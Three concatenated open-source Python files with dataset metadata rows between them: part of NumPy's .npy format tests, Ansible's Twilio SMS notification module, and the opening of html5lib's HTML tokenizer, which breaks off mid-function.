basic.reshape((30, 50))[::-1, ::2],
])
# More complicated record arrays.
# This is the structure of the table used for plain objects:
#
# +-+-+-+
# |x|y|z|
# +-+-+-+
# Structure of a plain array description:
Pdescr = [
('x', 'i4', (2,)),
('y', 'f8', (2, 2)),
('z', 'u1')]
# A plain list of tuples with values for testing:
PbufferT = [
# x y z
([3, 2], [[6., 4.], [6., 4.]], 8),
([4, 3], [[7., 5.], [7., 5.]], 9),
]
# This is the structure of the table used for nested objects (DON'T PANIC!):
#
# +-+---------------------------------+-----+----------+-+-+
# |x|Info |color|info |y|z|
# | +-----+--+----------------+----+--+ +----+-----+ | |
# | |value|y2|Info2 |name|z2| |Name|Value| | |
# | | | +----+-----+--+--+ | | | | | | |
# | | | |name|value|y3|z3| | | | | | | |
# +-+-----+--+----+-----+--+--+----+--+-----+----+-----+-+-+
#
# The corresponding nested array description:
Ndescr = [
('x', 'i4', (2,)),
('Info', [
('value', 'c16'),
('y2', 'f8'),
('Info2', [
('name', 'S2'),
('value', 'c16', (2,)),
('y3', 'f8', (2,)),
('z3', 'u4', (2,))]),
('name', 'S2'),
('z2', 'b1')]),
('color', 'S2'),
('info', [
('Name', 'U8'),
('Value', 'c16')]),
('y', 'f8', (2, 2)),
('z', 'u1')]
NbufferT = [
# x Info color info y z
# value y2 Info2 name z2 Name Value
# name value y3 z3
([3, 2], (6j, 6., ('nn', [6j, 4j], [6., 4.], [1, 2]), 'NN', True),
'cc', ('NN', 6j), [[6., 4.], [6., 4.]], 8),
([4, 3], (7j, 7., ('oo', [7j, 5j], [7., 5.], [2, 1]), 'OO', False),
'dd', ('OO', 7j), [[7., 5.], [7., 5.]], 9),
]
record_arrays = [
np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('<')),
np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('<')),
np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('>')),
np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('>')),
]
#BytesIO that reads a random number of bytes at a time
class BytesIOSRandomSize(BytesIO):
def read(self, size=None):
import random
size = random.randint(1, size)
return super(BytesIOSRandomSize, self).read(size)
def roundtrip(arr):
f = BytesIO()
format.write_array(f, arr)
f2 = BytesIO(f.getvalue())
arr2 = format.read_array(f2)
return arr2
def roundtrip_randsize(arr):
f = BytesIO()
format.write_array(f, arr)
f2 = BytesIOSRandomSize(f.getvalue())
arr2 = format.read_array(f2)
return arr2
def roundtrip_truncated(arr):
f = BytesIO()
format.write_array(f, arr)
#BytesIO is one byte short
f2 = BytesIO(f.getvalue()[0:-1])
arr2 = format.read_array(f2)
return arr2
def assert_equal_(o1, o2):
assert_(o1 == o2)
def test_roundtrip():
for arr in basic_arrays + record_arrays:
arr2 = roundtrip(arr)
yield assert_array_equal, arr, arr2
def test_roundtrip_randsize():
for arr in basic_arrays + record_arrays:
if arr.dtype != object:
arr2 = roundtrip_randsize(arr)
yield assert_array_equal, arr, arr2
def test_roundtrip_truncated():
for arr in basic_arrays:
if arr.dtype != object:
yield assert_raises, ValueError, roundtrip_truncated, arr
def test_long_str():
# check items larger than internal buffer size, gh-4027
long_str_arr = np.ones(1, dtype=np.dtype((str, format.BUFFER_SIZE + 1)))
long_str_arr2 = roundtrip(long_str_arr)
assert_array_equal(long_str_arr, long_str_arr2)
@dec.slow
def test_memmap_roundtrip():
# Fixme: test crashes nose on windows.
if not (sys.platform == 'win32' or sys.platform == 'cygwin'):
for arr in basic_arrays + record_arrays:
if arr.dtype.hasobject:
# Skip these since they can't be mmap'ed.
continue
# Write it out normally and through mmap.
nfn = os.path.join(tempdir, 'normal.npy')
mfn = os.path.join(tempdir, 'memmap.npy')
fp = open(nfn, 'wb')
try:
format.write_array(fp, arr)
finally:
fp.close()
fortran_order = (
arr.flags.f_contiguous and not arr.flags.c_contiguous)
ma = format.open_memmap(mfn, mode='w+', dtype=arr.dtype,
shape=arr.shape, fortran_order=fortran_order)
ma[...] = arr
del ma
# Check that both of these files' contents are the same.
fp = open(nfn, 'rb')
normal_bytes = fp.read()
fp.close()
fp = open(mfn, 'rb')
memmap_bytes = fp.read()
fp.close()
yield assert_equal_, normal_bytes, memmap_bytes
# Check that reading the file using memmap works.
ma = format.open_memmap(nfn, mode='r')
del ma
def test_compressed_roundtrip():
arr = np.random.rand(200, 200)
npz_file = os.path.join(tempdir, 'compressed.npz')
np.savez_compressed(npz_file, arr=arr)
arr1 = np.load(npz_file)['arr']
assert_array_equal(arr, arr1)
def test_python2_python3_interoperability():
if sys.version_info[0] >= 3:
fname = 'win64python2.npy'
else:
fname = 'python3.npy'
path = os.path.join(os.path.dirname(__file__), 'data', fname)
data = np.load(path)
assert_array_equal(data, np.ones(2))
def test_pickle_python2_python3():
# Test that loading object arrays saved on Python 2 works both on
# Python 2 and Python 3 and vice versa
data_dir = os.path.join(os.path.dirname(__file__), 'data')
if sys.version_info[0] >= 3:
xrange = range
else:
import __builtin__
xrange = __builtin__.xrange
expected = np.array([None, xrange, sixu('\u512a\u826f'),
asbytes('\xe4\xb8\x8d\xe8\x89\xaf')],
dtype=object)
for fname in ['py2-objarr.npy', 'py2-objarr.npz',
'py3-objarr.npy', 'py3-objarr.npz']:
path = os.path.join(data_dir, fname)
if (fname.endswith('.npz') and sys.version_info[0] == 2 and
sys.version_info[1] < 7):
# Reading object arrays directly from zipfile appears to fail
# on Py2.6, see cfae0143b4
continue
for encoding in ['bytes', 'latin1']:
if (sys.version_info[0] >= 3 and sys.version_info[1] < 4 and
encoding == 'bytes'):
# The bytes encoding is available starting from Python 3.4
continue
data_f = np.load(path, encoding=encoding)
if fname.endswith('.npz'):
data = data_f['x']
data_f.close()
else:
data = data_f
if sys.version_info[0] >= 3:
if encoding == 'latin1' and fname.startswith('py2'):
assert_(isinstance(data[3], str))
assert_array_equal(data[:-1], expected[:-1])
# mojibake occurs
assert_array_equal(data[-1].encode(encoding), expected[-1])
else:
assert_(isinstance(data[3], bytes))
assert_array_equal(data, expected)
else:
assert_array_equal(data, expected)
if sys.version_info[0] >= 3:
if fname.startswith('py2'):
if fname.endswith('.npz'):
data = np.load(path)
assert_raises(UnicodeError, data.__getitem__, 'x')
data.close()
data = np.load(path, fix_imports=False, encoding='latin1')
assert_raises(ImportError, data.__getitem__, 'x')
data.close()
else:
assert_raises(UnicodeError, np.load, path)
assert_raises(ImportError, np.load, path,
encoding='latin1', fix_imports=False)
def test_pickle_disallow():
data_dir = os.path.join(os.path.dirname(__file__), 'data')
path = os.path.join(data_dir, 'py2-objarr.npy')
assert_raises(ValueError, np.load, path,
allow_pickle=False, encoding='latin1')
path = os.path.join(data_dir, 'py2-objarr.npz')
f = np.load(path, allow_pickle=False, encoding='latin1')
assert_raises(ValueError, f.__getitem__, 'x')
path = os.path.join(tempdir, 'pickle-disabled.npy')
assert_raises(ValueError, np.save, path, np.array([None], dtype=object),
allow_pickle=False)
def test_version_2_0():
f = BytesIO()
# requires more than 2 byte for header
dt = [(("%d" % i) * 100, float) for i in range(500)]
d = np.ones(1000, dtype=dt)
format.write_array(f, d, version=(2, 0))
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
format.write_array(f, d)
assert_(w[0].category is UserWarning)
f.seek(0)
n = format.read_array(f)
assert_array_equal(d, n)
# 1.0 requested but data cannot be saved this way
assert_raises(ValueError, format.write_array, f, d, (1, 0))
def test_version_2_0_memmap():
# requires more than 2 byte for header
dt = [(("%d" % i) * 100, float) for i in range(500)]
d = np.ones(1000, dtype=dt)
tf = tempfile.mktemp('', 'mmap', dir=tempdir)
# 1.0 requested but data cannot be saved this way
assert_raises(ValueError, format.open_memmap, tf, mode='w+', dtype=d.dtype,
shape=d.shape, version=(1, 0))
ma = format.open_memmap(tf, mode='w+', dtype=d.dtype,
shape=d.shape, version=(2, 0))
ma[...] = d
del ma
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
ma = format.open_memmap(tf, mode='w+', dtype=d.dtype,
shape=d.shape, version=None)
assert_(w[0].category is UserWarning)
ma[...] = d
del ma
ma = format.open_memmap(tf, mode='r')
assert_array_equal(ma, d)
def test_write_version():
f = BytesIO()
arr = np.arange(1)
# These should pass.
format.write_array(f, arr, version=(1, 0))
format.write_array(f, arr)
format.write_array(f, arr, version=None)
format.write_array(f, arr)
format.write_array(f, arr, version=(2, 0))
format.write_array(f, arr)
# These should all fail.
bad_versions = [
(1, 1),
(0, 0),
(0, 1),
(2, 2),
(255, 255),
]
for version in bad_versions:
try:
format.write_array(f, arr, version=version)
except ValueError:
pass
else:
raise AssertionError("we should have raised a ValueError for the bad version %r" % (version,))
bad_version_magic = asbytes_nested([
'\x93NUMPY\x01\x01',
'\x93NUMPY\x00\x00',
'\x93NUMPY\x00\x01',
'\x93NUMPY\x02\x00',
'\x93NUMPY\x02\x02',
'\x93NUMPY\xff\xff',
])
malformed_magic = asbytes_nested([
'\x92NUMPY\x01\x00',
'\x00NUMPY\x01\x00',
'\x93numpy\x01\x00',
'\x93MATLB\x01\x00',
'\x93NUMPY\x01',
'\x93NUMPY',
'',
])
def test_read_magic():
s1 = BytesIO()
s2 = BytesIO()
arr = np.ones((3, 6), dtype=float)
format.write_array(s1, arr, version=(1, 0))
format.write_array(s2, arr, version=(2, 0))
s1.seek(0)
s2.seek(0)
version1 = format.read_magic(s1)
version2 = format.read_magic(s2)
assert_(version1 == (1, 0))
assert_(version2 == (2, 0))
assert_(s1.tell() == format.MAGIC_LEN)
assert_(s2.tell() == format.MAGIC_LEN)
def test_read_magic_bad_magic():
for magic in malformed_magic:
f = BytesIO(magic)
yield raises(ValueError)(format.read_magic), f
def test_read_version_1_0_bad_magic():
for magic in bad_version_magic + malformed_magic:
f = BytesIO(magic)
yield raises(ValueError)(format.read_array), f
def test_bad_magic_args():
assert_raises(ValueError, format.magic, -1, 1)
assert_raises(ValueError, format.magic, 256, 1)
assert_raises(ValueError, format.magic, 1, -1)
assert_raises(ValueError, format.magic, 1, 256)
def test_large_header():
s = BytesIO()
d = {'a': 1, 'b': 2}
format.write_array_header_1_0(s, d)
s = BytesIO()
d = {'a': 1, 'b': 2, 'c': 'x'*256*256}
assert_raises(ValueError, format.write_array_header_1_0, s, d)
def test_read_array_header_1_0():
s = BytesIO()
arr = np.ones((3, 6), dtype=float)
format.write_array(s, arr, version=(1, 0))
s.seek(format.MAGIC_LEN)
shape, fortran, dtype = format.read_array_header_1_0(s)
assert_((shape, fortran, dtype) == ((3, 6), False, float))
def test_read_array_header_2_0():
s = BytesIO()
arr = np.ones((3, 6), dtype=float)
format.write_array(s, arr, version=(2, 0))
s.seek(format.MAGIC_LEN)
shape, fortran, dtype = format.read_array_header_2_0(s)
assert_((shape, fortran, dtype) == ((3, 6), False, float))
def test_bad_header():
# header of length less than 2 should fail
s = BytesIO()
assert_raises(ValueError, format.read_array_header_1_0, s)
s = BytesIO(asbytes('1'))
assert_raises(ValueError, format.read_array_header_1_0, s)
# header shorter than indicated size should fail
s = BytesIO(asbytes('\x01\x00'))
assert_raises(ValueError, format.read_array_header_1_0, s)
# headers without the exact keys required should fail
d = {"shape": (1, 2),
"descr": "x"}
s = BytesIO()
format.write_array_header_1_0(s, d)
assert_raises(ValueError, format.read_array_header_1_0, s)
d = {"shape": (1, 2),
"fortran_order": False,
"descr": "x",
"extrakey": -1}
s = BytesIO()
format.write_array_header_1_0(s, d)
assert_raises(ValueError, format.read_array_header_1_0, s)
def test_large_file_support():
if (sys.platform == 'win32' or sys.platform == 'cygwin'):
raise SkipTest("Unknown if Windows has sparse filesystems")
# try creating a large sparse file
tf_name = os.path.join(tempdir, 'sparse_file')
try:
# seek past end would work too, but linux truncate somewhat
# increases the chances that we have a sparse filesystem and can
# avoid actually writing 5GB
import subprocess as sp
sp.check_call(["truncate", "-s", "5368709120", tf_name])
except:
raise SkipTest("Could not create 5GB large file")
# write a small array to the end
with open(tf_name, "wb") as f:
f.seek(5368709120)
d = np.arange(5)
np.save(f, d)
# read it back
with open(tf_name, "rb") as f:
f.seek(5368709120)
r = np.load(f)
assert_array_equal(r, d)
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 | 71,527,679,412,550,640 | 39.75 | 565 | 0.473298 | false |
jcpowermac/ansible | lib/ansible/modules/notification/twilio.py | 47 | 5594 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Matt Makai <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
version_added: "1.6"
module: twilio
short_description: Sends a text message to a mobile phone through Twilio.
description:
- Sends a text message to a phone number through the Twilio messaging API.
notes:
- This module is non-idempotent because it sends an email through the
external API. It is idempotent only in the case that the module fails.
- Like the other notification modules, this one requires an external
dependency to work. In this case, you'll need a Twilio account with
a purchased or verified phone number to send the text message.
options:
account_sid:
description:
user's Twilio account token found on the account page
required: true
auth_token:
description: user's Twilio authentication token
required: true
msg:
description:
the body of the text message
required: true
to_number:
description:
one or more phone numbers to send the text message to,
format +15551112222
required: true
from_number:
description:
the Twilio number to send the text message from, format +15551112222
required: true
media_url:
description:
a URL with a picture, video or sound clip to send with an MMS
(multimedia message) instead of a plain SMS
required: false
author: "Matt Makai (@makaimc)"
'''
EXAMPLES = '''
# send an SMS about the build status to (555) 303 5681
# note: replace account_sid and auth_token values with your credentials
# and you have to have the 'from_number' on your Twilio account
- twilio:
msg: All servers with webserver role are now configured.
account_sid: ACXXXXXXXXXXXXXXXXX
auth_token: ACXXXXXXXXXXXXXXXXX
from_number: +15552014545
to_number: +15553035681
delegate_to: localhost
# send an SMS to multiple phone numbers about the deployment
# note: replace account_sid and auth_token values with your credentials
# and you have to have the 'from_number' on your Twilio account
- twilio:
msg: This server configuration is now complete.
account_sid: ACXXXXXXXXXXXXXXXXX
auth_token: ACXXXXXXXXXXXXXXXXX
from_number: +15553258899
to_number:
- +15551113232
- +12025551235
- +19735559010
delegate_to: localhost
# send an MMS to a single recipient with an update on the deployment
# and an image of the results
# note: replace account_sid and auth_token values with your credentials
# and you have to have the 'from_number' on your Twilio account
- twilio:
msg: Deployment complete!
account_sid: ACXXXXXXXXXXXXXXXXX
auth_token: ACXXXXXXXXXXXXXXXXX
from_number: +15552014545
to_number: +15553035681
media_url: https://demo.twilio.com/logo.png
delegate_to: localhost
'''
# =======================================
# twilio module support methods
#
import json
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.parse import urlencode
from ansible.module_utils.urls import fetch_url
def post_twilio_api(module, account_sid, auth_token, msg, from_number,
to_number, media_url=None):
URI = "https://api.twilio.com/2010-04-01/Accounts/%s/Messages.json" \
% (account_sid,)
AGENT = "Ansible"
data = {'From': from_number, 'To': to_number, 'Body': msg}
if media_url:
data['MediaUrl'] = media_url
encoded_data = urlencode(data)
headers = {'User-Agent': AGENT,
'Content-type': 'application/x-www-form-urlencoded',
'Accept': 'application/json',
}
# Hack module params to have the Basic auth params that fetch_url expects
module.params['url_username'] = account_sid.replace('\n', '')
module.params['url_password'] = auth_token.replace('\n', '')
return fetch_url(module, URI, data=encoded_data, headers=headers)
# =======================================
# Main
#
def main():
module = AnsibleModule(
argument_spec=dict(
account_sid=dict(required=True),
auth_token=dict(required=True, no_log=True),
msg=dict(required=True),
from_number=dict(required=True),
to_number=dict(required=True),
media_url=dict(default=None, required=False),
),
supports_check_mode=True
)
account_sid = module.params['account_sid']
auth_token = module.params['auth_token']
msg = module.params['msg']
from_number = module.params['from_number']
to_number = module.params['to_number']
media_url = module.params['media_url']
if not isinstance(to_number, list):
to_number = [to_number]
for number in to_number:
r, info = post_twilio_api(module, account_sid, auth_token, msg,
from_number, number, media_url)
if info['status'] not in [200, 201]:
body_message = "unknown error"
if 'body' in info:
body = json.loads(info['body'])
body_message = body['message']
module.fail_json(msg="unable to send message to %s: %s" % (number, body_message))
module.exit_json(msg=msg, changed=False)
if __name__ == '__main__':
main()
| gpl-3.0 | -3,576,716,205,702,385,700 | 31.149425 | 93 | 0.652485 | false |
superchilli/webapp | venv/lib/python2.7/site-packages/html5lib/tokenizer.py | 1710 | 76929 | from __future__ import absolute_import, division, unicode_literals
try:
chr = unichr # flake8: noqa
except NameError:
pass
from collections import deque
from .constants import spaceCharacters
from .constants import entities
from .constants import asciiLetters, asciiUpper2Lower
from .constants import digits, hexDigits, EOF
from .constants import tokenTypes, tagTokenTypes
from .constants import replacementCharacters
from .inputstream import HTMLInputStream
from .trie import Trie
entitiesTrie = Trie(entities)
class HTMLTokenizer(object):
""" This class takes care of tokenizing HTML.
* self.currentToken
Holds the token that is currently being processed.
* self.state
Holds a reference to the method to be invoked... XXX
* self.stream
Points to HTMLInputStream object.
"""
def __init__(self, stream, encoding=None, parseMeta=True, useChardet=True,
lowercaseElementName=True, lowercaseAttrName=True, parser=None):
self.stream = HTMLInputStream(stream, encoding, parseMeta, useChardet)
self.parser = parser
# Perform case conversions?
self.lowercaseElementName = lowercaseElementName
self.lowercaseAttrName = lowercaseAttrName
# Setup the initial tokenizer state
self.escapeFlag = False
self.lastFourChars = []
self.state = self.dataState
self.escape = False
# The current token being created
self.currentToken = None
super(HTMLTokenizer, self).__init__()
def __iter__(self):
""" This is where the magic happens.
We do our usually processing through the states and when we have a token
to return we yield the token which pauses processing until the next token
is requested.
"""
self.tokenQueue = deque([])
# Start processing. When EOF is reached self.state will return False
# instead of True and the loop will terminate.
while self.state():
while self.stream.errors:
yield {"type": tokenTypes["ParseError"], "data": self.stream.errors.pop(0)}
while self.tokenQueue:
yield self.tokenQueue.popleft()
def consumeNumberEntity(self, isHex):
"""This function returns either U+FFFD or the character based on the
decimal or hexadecimal representation. It also discards ";" if present.
If not present self.tokenQueue.append({"type": tokenTypes["ParseError"]}) is invoked.
"""
allowed = digits
radix = 10
if isHex:
allowed = hexDigits
radix = 16
charStack = []
# Consume all the characters that are in range while making sure we
# don't hit an EOF.
c = self.stream.char()
while c in allowed and c is not EOF:
charStack.append(c)
c = self.stream.char()
# Convert the set of characters consumed to an int.
charAsInt = int("".join(charStack), radix)
# Certain characters get replaced with others
if charAsInt in replacementCharacters:
char = replacementCharacters[charAsInt]
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
elif ((0xD800 <= charAsInt <= 0xDFFF) or
(charAsInt > 0x10FFFF)):
char = "\uFFFD"
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
else:
# Should speed up this check somehow (e.g. move the set to a constant)
if ((0x0001 <= charAsInt <= 0x0008) or
(0x000E <= charAsInt <= 0x001F) or
(0x007F <= charAsInt <= 0x009F) or
(0xFDD0 <= charAsInt <= 0xFDEF) or
charAsInt in frozenset([0x000B, 0xFFFE, 0xFFFF, 0x1FFFE,
0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE,
0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE,
0x7FFFF, 0x8FFFE, 0x8FFFF, 0x9FFFE,
0x9FFFF, 0xAFFFE, 0xAFFFF, 0xBFFFE,
0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE,
0xFFFFF, 0x10FFFE, 0x10FFFF])):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
try:
# Try/except needed as UCS-2 Python builds' unichar only works
# within the BMP.
char = chr(charAsInt)
except ValueError:
v = charAsInt - 0x10000
char = chr(0xD800 | (v >> 10)) + chr(0xDC00 | (v & 0x3FF))
# Discard the ; if present. Otherwise, put it back on the queue and
# invoke parseError on parser.
if c != ";":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"numeric-entity-without-semicolon"})
self.stream.unget(c)
return char
def consumeEntity(self, allowedChar=None, fromAttribute=False):
# Initialise to the default output for when no entity is matched
output = "&"
charStack = [self.stream.char()]
if (charStack[0] in spaceCharacters or charStack[0] in (EOF, "<", "&")
or (allowedChar is not None and allowedChar == charStack[0])):
self.stream.unget(charStack[0])
elif charStack[0] == "#":
# Read the next character to see if it's hex or decimal
hex = False
charStack.append(self.stream.char())
if charStack[-1] in ("x", "X"):
hex = True
charStack.append(self.stream.char())
# charStack[-1] should be the first digit
if (hex and charStack[-1] in hexDigits) \
or (not hex and charStack[-1] in digits):
# At least one digit found, so consume the whole number
self.stream.unget(charStack[-1])
output = self.consumeNumberEntity(hex)
else:
# No digits found
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "expected-numeric-entity"})
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
else:
# At this point in the process might have named entity. Entities
# are stored in the global variable "entities".
#
# Consume characters and compare to these to a substring of the
# entity names in the list until the substring no longer matches.
while (charStack[-1] is not EOF):
if not entitiesTrie.has_keys_with_prefix("".join(charStack)):
break
charStack.append(self.stream.char())
# At this point we have a string that starts with some characters
# that may match an entity
# Try to find the longest entity the string will match to take care
# of ¬i for instance.
try:
entityName = entitiesTrie.longest_prefix("".join(charStack[:-1]))
entityLength = len(entityName)
except KeyError:
entityName = None
if entityName is not None:
if entityName[-1] != ";":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"named-entity-without-semicolon"})
if (entityName[-1] != ";" and fromAttribute and
(charStack[entityLength] in asciiLetters or
charStack[entityLength] in digits or
charStack[entityLength] == "=")):
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
else:
output = entities[entityName]
self.stream.unget(charStack.pop())
output += "".join(charStack[entityLength:])
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-named-entity"})
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
if fromAttribute:
self.currentToken["data"][-1][1] += output
else:
if output in spaceCharacters:
tokenType = "SpaceCharacters"
else:
tokenType = "Characters"
self.tokenQueue.append({"type": tokenTypes[tokenType], "data": output})
def processEntityInAttribute(self, allowedChar):
"""This method replaces the need for "entityInAttributeValueState".
"""
self.consumeEntity(allowedChar=allowedChar, fromAttribute=True)
def emitCurrentToken(self):
"""This method is a generic handler for emitting the tags. It also sets
the state to "data" because that's what's needed after a token has been
emitted.
"""
token = self.currentToken
# Add token to the queue to be yielded
if (token["type"] in tagTokenTypes):
if self.lowercaseElementName:
token["name"] = token["name"].translate(asciiUpper2Lower)
if token["type"] == tokenTypes["EndTag"]:
if token["data"]:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "attributes-in-end-tag"})
if token["selfClosing"]:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "self-closing-flag-on-end-tag"})
self.tokenQueue.append(token)
self.state = self.dataState
# Below are the various tokenizer states worked out.
def dataState(self):
data = self.stream.char()
if data == "&":
self.state = self.entityDataState
elif data == "<":
self.state = self.tagOpenState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\u0000"})
elif data is EOF:
# Tokenization ends.
return False
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data":
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(("&", "<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def entityDataState(self):
self.consumeEntity()
self.state = self.dataState
return True
def rcdataState(self):
data = self.stream.char()
if data == "&":
self.state = self.characterReferenceInRcdata
elif data == "<":
self.state = self.rcdataLessThanSignState
elif data == EOF:
# Tokenization ends.
return False
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data":
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(("&", "<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def characterReferenceInRcdata(self):
self.consumeEntity()
self.state = self.rcdataState
return True
def rawtextState(self):
data = self.stream.char()
if data == "<":
self.state = self.rawtextLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(("<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def scriptDataState(self):
data = self.stream.char()
if data == "<":
self.state = self.scriptDataLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(("<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def plaintextState(self):
data = self.stream.char()
if data == EOF:
# Tokenization ends.
return False
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + self.stream.charsUntil("\u0000")})
return True
def tagOpenState(self):
data = self.stream.char()
if data == "!":
self.state = self.markupDeclarationOpenState
elif data == "/":
self.state = self.closeTagOpenState
elif data in asciiLetters:
self.currentToken = {"type": tokenTypes["StartTag"],
"name": data, "data": [],
"selfClosing": False,
"selfClosingAcknowledged": False}
self.state = self.tagNameState
elif data == ">":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name-but-got-right-bracket"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<>"})
self.state = self.dataState
elif data == "?":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name-but-got-question-mark"})
self.stream.unget(data)
self.state = self.bogusCommentState
else:
# XXX
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.dataState
return True
def closeTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.currentToken = {"type": tokenTypes["EndTag"], "name": data,
"data": [], "selfClosing": False}
self.state = self.tagNameState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-right-bracket"})
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-eof"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.state = self.dataState
else:
# XXX data can be _'_...
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-char",
"datavars": {"data": data}})
self.stream.unget(data)
self.state = self.bogusCommentState
return True
def tagNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == ">":
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-tag-name"})
self.state = self.dataState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] += "\uFFFD"
else:
self.currentToken["name"] += data
# (Don't use charsUntil here, because tag names are
# very short and it's faster to not do anything fancy)
return True
def rcdataLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.rcdataEndTagOpenState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rcdataEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
